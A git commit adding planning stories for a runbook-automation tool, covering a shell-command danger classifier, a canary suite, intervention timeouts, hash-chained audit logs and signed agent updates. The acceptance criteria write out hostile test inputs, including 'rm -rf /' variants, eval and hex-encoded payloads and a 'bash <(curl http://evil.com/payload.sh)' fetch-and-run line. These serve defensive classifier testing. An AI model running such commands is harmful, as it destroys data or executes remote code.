Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting): - P1 route: 8pts (key redaction, SSE billing, token math, CI runner) - P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber) - P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation) - P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier) - P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback) - P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures) Total: 61 story points across 30 new stories
2026-03-01 02:27:55 +00:00
parent cc003cbb1c
commit 72a0f26a7b
6 changed files with 449 additions and 0 deletions
--- a/products/06-runbook-automation/epics/epic-addendum-bmad.md
+++ b/products/06-runbook-automation/epics/epic-addendum-bmad.md
@@ -0,0 +1,81 @@
+# dd0c/run — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Runbook Parser
+
+### Story 1.7: Shell AST Parsing (Not Regex)
+As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
+
+**Acceptance Criteria:**
+- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
+- `eval $(echo 'rm -rf /')` classified as Dangerous.
+- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
+- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
+- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
+- Heredoc with embedded danger classified as Dangerous.
+- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
+- `kubectl get pods -n production` classified as Safe.
+
+**Estimate:** 5 points
+
+---
+
+## Epic 2 Addendum: Action Classifier
+
+### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
+As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
+
+**Acceptance Criteria:**
+- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
+- All 50 classified as Dangerous — any miss is a blocking CI failure.
+- Suite count assertion prevents accidental removal of canary commands.
+- Runs on every push and PR.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 3 Addendum: Execution Engine
+
+### Story 3.8: Intervention Deadlock TTL
+As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
+
+**Acceptance Criteria:**
+- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
+- FailedClosed triggers out-of-band critical alert with execution context.
+- Human resolution before TTL transitions to Complete (no FailedClosed).
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Audit Trail
+
+### Story 5.7: Streaming Append-Only Audit with Hash Chain
+As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
+
+**Acceptance Criteria:**
+- Audit event available within 100ms of command execution (no batching).
+- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
+- WAL (write-ahead log): events survive agent crash and are recoverable.
+
+**Estimate:** 3 points
+
+### Story 5.8: Cryptographic Signatures for Agent Updates
+As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
+
+**Acceptance Criteria:**
+- Agent rejects binary update with invalid signature.
+- Agent rejects policy update signed only by SaaS key (requires customer key).
+- Agent accepts update with valid customer signature.
+- Failed signature verification falls back to existing policy (no degradation).
+
+**Estimate:** 3 points
+
+---
+
+**Total Addendum:** 15 points across 5 stories